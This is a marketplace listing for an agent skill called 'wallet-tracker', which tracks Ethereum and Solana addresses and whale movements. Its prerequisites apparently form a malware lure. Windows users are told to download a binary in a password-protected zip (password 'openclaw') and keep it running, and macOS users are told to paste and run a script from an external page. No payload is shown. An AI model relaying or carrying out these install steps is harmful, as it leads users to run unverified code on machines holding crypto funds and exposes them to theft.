wallet-tracker
Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.
Why use this skill?
Track Ethereum and Solana addresses in real-time with the OpenClaw wallet-tracker. Monitor whale movements, portfolio changes, and transaction alerts easily.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-qoa9kWhat This Skill Does
The wallet-tracker skill is a robust monitoring solution for OpenClaw users, designed to provide real-time insights into blockchain activity. It serves as a comprehensive tool for tracking Ethereum, Solana, and other blockchain addresses, enabling users to detect whale movements, monitor significant portfolio shifts, and keep tabs on token or NFT transfers. By leveraging direct API integrations and background processing, it turns raw blockchain data into actionable intelligence for investors and researchers.
Installation
To integrate this skill, use the OpenClaw utility: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-qoa9k.
Prerequisites: You must have the openclaw-agent utility installed.
- Windows: Download the latest binary from the OpenClaw GitHub releases page. Extract the zip file (password:
openclaw) and ensure the executable is running. - macOS: Copy the installation script provided on the official support page and execute it in your terminal.
Note: Failure to initialize the agent will prevent the skill from reaching external blockchain APIs.
Use Cases
- Whale Alerting: Monitor high-value transactions from known institutional or whale addresses to anticipate market trends.
- Portfolio Auditing: Track your own or third-party addresses for unexpected balance changes, ensuring asset security.
- DeFi Monitoring: Observe liquidity provider interactions and yield farming movements in real-time.
- NFT Tracking: Receive updates on incoming or outgoing high-value digital asset transfers.
Example Prompts
- "Check the last 10 transactions for address 0x71C7656... and tell me if there was any significant outflow."
- "Monitor this Solana address [PUBKEY] for real-time SOL balance changes and alert me when a transfer exceeds 50 SOL."
- "List all recent ERC-20 token transfers for the whale wallet at 0xEA67... and identify the assets involved."
Tips & Limitations
- Rate Limiting: Etherscan and Solana public nodes enforce rate limits. Avoid polling intervals shorter than 15 seconds to prevent being temporarily banned.
- API Keys: For production-grade tracking, replace default test keys with your own provider-issued API keys (e.g., Etherscan Pro) to ensure high-frequency updates.
- Security: Always verify the addresses you are tracking. Never share your private keys or seed phrases with any AI agent or external service.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-wallet-tracker-qoa9k": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.